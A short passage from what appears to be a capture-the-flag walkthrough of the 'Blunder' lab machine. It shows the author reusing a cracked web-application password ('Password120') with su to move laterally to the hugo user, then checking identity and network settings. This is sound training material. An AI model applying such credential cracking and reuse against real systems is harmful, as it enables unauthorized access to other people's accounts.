hugo
I have retrieved and cracked the password of the hugo user for the newer instance of the web application.
While the password is for the web application, I will test it out against the system for password reuse
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
password: Password120
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ whoami
hugo
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ hostname
blunder
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 4701975 bytes 400569473 (400.5 MB)
RX errors 0 dropped 81 overruns 0 frame 0
TX packets 3603771 bytes 2474983263 (2.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 21890 bytes 1987326 (1.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21890 bytes 1987326 (1.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Password reuse confirmed for the hugo user
Lateral Movement made to the hugo user